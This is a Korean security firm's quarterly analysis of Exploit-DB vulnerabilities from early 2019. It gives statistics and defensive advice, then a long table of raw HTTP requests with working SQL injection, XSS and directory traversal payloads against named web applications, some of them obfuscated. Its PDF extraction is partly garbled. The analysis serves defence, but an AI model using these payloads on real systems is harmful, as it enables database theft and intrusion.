EDB 분석 보고서 (2019.1Q) - 펜타시큐리티시스템

1. 취약점별 보고 개수취약점 보고 개수

SQL Injection 116

XSS 42

Directory Traversal 8

File Upload 4

LFI 3

총합계 173

2. 위험도별 분류위험도 보고 개수 백분율

상 15 8.67%

중 42 24.28%

하 116 67.05%

총합계 173 100.00%

3. 공격 난이도별 현황공격 난이도 보고 개수 백분율

상 6 3.47%

중 38 21.97% POST

/10.0.100.24/administ하 129 74.57%

총합계 173 100.00%

4. 주요 소프트웨어별 취약점 발생 현황소프트웨어 이름(보고 개수 2개 이상) 보고 개수

Joomla! Component 12

Netartmedia 8

Jettweb 6

DomainMOD 4

qdPM 3

osCommerce 3

Ask Expert Script 2

Zeeways 2

PHP Ecommerce Script 2

PHP Dashboards NEW 2

phpTransformer 2

CMSsite 2

XAMPP 2

SJS 2

WordPress Plugin 2

SuiteCRM 2

Roxy Fileman 2

Find a Place CMS Directory 2

Apache CouchDB 2

pfSense 2

총합계 64

EDB 분석 보고서 (2019.1Q)2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.

분석 내용 정리 (작성: 펜타시큐리티시스템 보안성평가팀)

2019년 01월부터 03월까지 EDB 분석 보고서에 공개된 취약점은 173개입니다.

가장 많은 수의 취약점이 공개된 공격은 SQL Injection 입니다. 또한 많은 취약점이 공개된 소프트웨어는 Joomla Component, Netartmedia로, 각각 12개, 8개의 취약점이 공개되었습니다. 그

중 Joomla Component 소프트웨어에 수행된 공격은 SQL Injection이며, 본 공격은 처음에는 난이도가 낮은 공격이라도 일단 취약점이 발견되면 해당 취약점의 파라미터에 다양한 SQL 쿼리를

이용하는 SQL Injection 공격을 할 수 있으므로 위험도 측면에서는 매우 높은 공격에 속합니다. 해당 취약점을 예방하기 위해서 최신 패치와 시큐어 코딩을 권장합니다. 하지만 완벽한 시큐

어 코딩은 불가능하며, 지속적으로 보안성을 유지하기 위해서 웹방화벽을 활용한 심층방어 (Defense indepth) 구현을 고려해야 합니다.

116

42

84 3

0

20

40

60

80

100

120

140

SQL Injection XSS Directory Traversal File Upload LFI

취약점별 보고 개수

15

42

116

위험도별 분류

상

중

하

6

38

129

공격 난이도별 현황

상

중

하

12

8

6

433

2

2

2

2

2

2

2

2

2

2

2

22

2

주요 소프트웨어별 취약점 발생 현황

Joomla! Component Netartmedia Jettweb DomainMOD

qdPM osCommerce Ask Expert Script Zeeways

PHP Ecommerce Script PHP Dashboards NEW phpTransformer CMSsite

XAMPP SJS WordPress Plugin SuiteCRM

Roxy Fileman Find a Place CMS Directory Apache CouchDB pfSense

날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경

2019-01-02 46066 SQL Injection 하 중

WordPress Plugin Adicon

Server 1.2 - 'selectedPlace' SQL

Injection

POST /10.0.100.24 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD);

WordPress PluginWordPress

Plugin AdiconServer 1.2

2019-01-02 46067 XSS 하 하Frog CMS 0.9.5 - Cross-Site

Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 34Connection: closeUpgrade-Insecure-Requests: 1

username=<script>alert(1)</script>

Frog CMSFrog CMS0.9.5

2019-01-07 46076 XSS 하 하Embed Video Scripts -

Persistent Cross-Site Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencodedContent-Length: 126

Connection: closeUpgrade-Insecure-Requests: 1

message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=h

ttps%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png

Embed VideoEmbed Video

Scripts

2019-01-07 46077 SQL Injection 하 상

All in One Video Downloader

1.2 - Authenticated SQL

Injection

POST /10.0.100.24/admin/?view=page- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87DNT: 1

Connection: keep-aliveUpgrade-Insecure-Requests: 1

edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -

All in One Video

Downloader

All in OneVideo

Downloader1.2

2019-01-07 46079 XSS 하 하LayerBB 1.1.1 - Persistent

Cross-Site Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 34Connection: closeUpgrade-Insecure-Requests: 1

title=<script>alert('XSS')</script>

LayerBB LayerBB 1.1.1

2019-01-07 46080 XSS 하 하

MyBB OUGC Awards Plugin

1.8.3 - Persistent Cross-Site

Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded

Content-Length: 34Connection: closeUpgrade-Insecure-Requests: 1

user=<script>alert('XSS')</script>

MyBB OUGC Awards

Plugin

MyBB OUGCAwards Plugin

1.8.3

2019-01-07 46081 XSS 하 하

PLC Wireless Router

GPN2.4P21-C-CN - Cross-Site

Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)

Gecko/20100101 Firefox/63.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 44Connection: closeUpgrade-Insecure-Requests: 1

payload=<script>alert("XSS-Saurav")</script>

PLC WirelessRouter

PLC WirelessRouter

GPN2.4P21-C-CN

2019-01-07 46082 XSS 하 하phpMoAdmin MongoDB GUI

1.1.5 - Cross-Site Scripting

GET/10.0.100.24/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencodedContent-Length: 101Connection: closeUpgrade-Insecure-Requests: 1

db=<script>alert(1)</script>newdb=<script>alert(2)</script>collection=<script>alert(3)</script>

phpMoAdmin MongoDBGUI

phpMoAdminMongoDB GUI

1.1.5

EDB 분석 보고서 (2019.1Q)

2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.





MyT Project Management 1.5.1

- 'Charge[group_total]' SQL

Injection

POST /10.0.100.24/charge/admin HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 172

Charge[user_name]=k&Charge[group_total]=1) ANDEXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT(ELT(2003=2003,1))),0x7170707071))--eaYu&Charge_page=1&ajax=charge-grid

MyT ProjectManagement

MyT ProjectManagement

1.5.1

2019-01-07 46172 File Upload 하 상Roxy Fileman 1.4.5 -

Unrestricted File Upload

GET/10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1

Roxy FilemanRoxy Fileman

1.4.5

2019-01-07 46172 Directory Traversal 중 하Roxy Fileman 1.4.5 - Directory

Traversal

GET/10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1

Roxy FilemanRoxy Fileman

1.4.5

2019-01-08 46095 SQL Injection 상 중Dolibarr ERP-CRM 8.0.4 - 'rowid'

SQL Injection

POST /10.0.100.24/doli/htdocs/admin/dict.php?id=16 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate

Connection: keep-alive


actionmodify=Modify&button_removefilter=Removefilter&button_search=Search&code=PL_NONE&entity=&from=&libelle=None&page=0&position=1&rowid=\%'

AND EXTRACTVALUE(6385,CONCAT(0x5c,0x716b717871,(SELECT(ELT(6385=6385,1))),0x7176787171)) AND'%'='&search_code=94102&token=$2y$10$KhKjYSBlkY24Xl8v.d0ZruN98LAFOAZ5a5dzi4Lxe3g21Gx46deHK

Dolibarr ERP-CRMDolibarr ERP-

CRM 8.0.4

2019-01-10 46111 SQL Injection 상 중doitX 1.0 - 'search' SQL

Injection

GET/10.0.100.24/searchs?search=%45%66%65%27%20%2f%2a%21%31%31%31%31

%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31,%76%65%72%73%69%6f%6e%28%29,%33%2c%34%2c%35,%3

6%2c%37%2c%38%2c%39%2c%31%30,%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35,%31%36%2c%31%37%2d%2d%20%2d&search_from=entries HTTP/1.1

doitX doitX 1.0

2019-01-10 46112 SQL Injection 상 중Shield CMS 2.2 - 'email' SQL

Injection

POST /10.0.100.24/shield/forgot.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 749Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%5

3%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%

4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined

Shield CMSShield CMS

2.2

2019-01-10 46113 SQL Injection 상 상Architectural 1.0 - 'email' SQL

Injection

POST /10.0.100.24/backoffice/forgot.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)


text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded

Content-Length: 749Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;

EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined

ArchitecturalArchitectural

1.0




2019-01-10 46114 SQL Injection 하 하 MLMPro 1.0 - SQL Injection

POST /10.0.100.24/login.php?section=login HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 538Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

username=%2d%31%27%20%55%4eI%4f%4e%20%2f%2a%21%31%31%31%31%31%53

EL%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36,%43%4f%4e%43%41%54%28%55%53%45%52%28%29%2c%30%78%32%64%2c%56%45%52%53%49%4f%4e%28%29%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36,%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2d%2d%20%2d&password=&submit=Login: undefined

MLMPro MLMPro 1.0

2019-01-10 46115 SQL Injection 하 하Event Calendar 3.7.4 - 'id' SQL

Injection

GET/10.0.100.24/events_edit.php?id=%2d%31%30%33%31%27%20%2f%2a%21%31%31%31%311%55%4e%49%4f%4e%20%2a%2f%2f%2a!11111SELE%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37,8--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflateCookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2;EU_COOKIE_LAW_CONSENT=trueDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Event CalendarEvent

Calendar3.7.4

2019-01-10 46116 SQL Injection 하 하Event Locations 1.0.1 - 'id' SQL

Injection

GET/10.0.100.24/events_edit.php?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1

Event LocationsEvent

Locations1.0.1

2019-01-10 46117 SQL Injection 중 하eBrigade ERP 4.5 - SQL

Injection

GET/10.0.100.24/pdf.php?pdf=DPS&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4fM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4fNCA%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43AT(C%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%

46%52OM+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+W%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54+%30%2c%31%29,%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+GR%4f%55%50%20%42%59%20%78%29%61%29HTTP/1.1

eBrigade ERPeBrigade ERP

4.5

2019-01-10 46118 SQL Injection 하 중OpenSource ERP 6.3.1. - SQL

Injection

POST /10.0.100.24/db/utils/query/data.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8Origin: http://10.0.100.24:1004Referer: http://10.0.100.24:1004/Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Cookie: MneHttpSessionId8024=15471285865828

Host: 10.0.100.24:1004

Content-Length: 414Accept-Encoding: gzip, deflateConnection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test

OpenSource ERPOpenSourceERP 6.3.1.

2019-01-11 46119 SQL Injection 중 하Adapt Inventory Management

System 1.0 - SQL Injection

POST /10.0.100.24/admin/login.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 291Cookie: PHPSESSID=e23redq9bp28kar813ggnk4g87DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&password=%27: undefined

Adapt InventoryManagement System

AdaptInventoryManagementSystem 1.0




2019-01-11 46122 SQL Injection 중 하Joomla! Component JoomCRM

1.1.1 - SQL Injection

GET

/10.0.100.24/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41T%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53E()%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%

41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3dDAT%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4fRMA%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __cfduid=d32095db21c106516d53cae46d08e3e291547158024;5cccc826c28cb27e67933089ce2566a0=1ad52e59a11808d25fa5e93d022c74f3; joomla_user_state=logged_inDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Joomla! ComponentJoomla!Component

JoomCRM 1.1.1

2019-01-14 46134 SQL Injection 하 중i-doit CMDB 1.12 - SQL

Injection

GET/10.0.100.24/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1

i-doit CMDBi-doit CMDB

1.12

2019-01-14 46138 SQL Injection 상 상 Modern POS 1.3 - SQL Injection

GET/10.0.100.24/_inc/pos.php?query_string=Efe%27||(/*!11111SElecT*/

+%27Efe%27+/*!11111FRom*/+/*!11111DuAl*/+/*!11111whERE*/+6=6+/*!11111anD*/+(/*!11111SEleCT*/+6+/*!11111FRoM*/(/*!11111SELECT*/+C

OuNT(*),/*!11111CONCAT*/(@@verSion,(/*!11111seleCT*/+(ELT(6=6,1))),/*!11111FLoOR*/(RAnD(0)*2))x+/*!11111FRoM*/+/*!12345InFOrMaTI

ON_SchEmA.plUgINS*/+/*!11111grOUP*/+/*!11111by*/+x)a))||%27&action_type=PRODUCTLIST HTTP/1.1

Modern POSModern POS

1.3

2019-01-14 46139 SQL Injection 하 하

Twilio WEB To Fax Machine

System Application 1.0 - SQL

Injection

POST /10.0.100.24/login_check.php HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate


Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9fDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

email=1&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&submit=Login: undefined

Twilio WEB To Fax

Machine SystemApplication

Twilio WEB ToFax Machine

SystemApplication

1.0

2019-01-14 46141 SQL Injection 하 하Live Call Support Widget 1.5 -

SQL Injection

GET/10.0.100.24/add_widget.php?wid=%2d%34%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e()%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1

Live Call SupportWidget

Live CallSupport

Widget 1.5

2019-01-14 46144 SQL Injection 하 중Craigs Classified Ads CMS

Theme 1.0.2 - SQL Injection

GET /10.0.100.24/profile_detail.php?users=-x%27%20UNION%20SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)

,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, brCookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4

DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Craigs ClassifiedAds CMS Theme

CraigsClassified

Ads CMS Theme1.0.2

2019-01-14 46145 SQL Injection 하 하Find a Place CMS Directory 1.5

- SQL Injection

GET

/10.0.100.24/detail.php?title=&id=2%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatI

ON_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1

Find a Place CMSDirectory

Find a PlaceCMS Directory

1.5

2019-01-14 46146 SQL Injection 하 중 Cleanto 5.0 - SQL Injection

POST /10.0.100.24/assets/lib/front_ajax.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 159Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1;__stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11;__stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

service_id=%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selEC

t(@x: =0x00)%2c(@rUNNing_nuMBer

Cleanto Cleanto 5.0





HealthNode Hospital

Management System 1.0 - SQL

Injection

GET /10.0.100.24/dashboard/Patient/patientdetails.php?id=-11%2d%31%31%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c

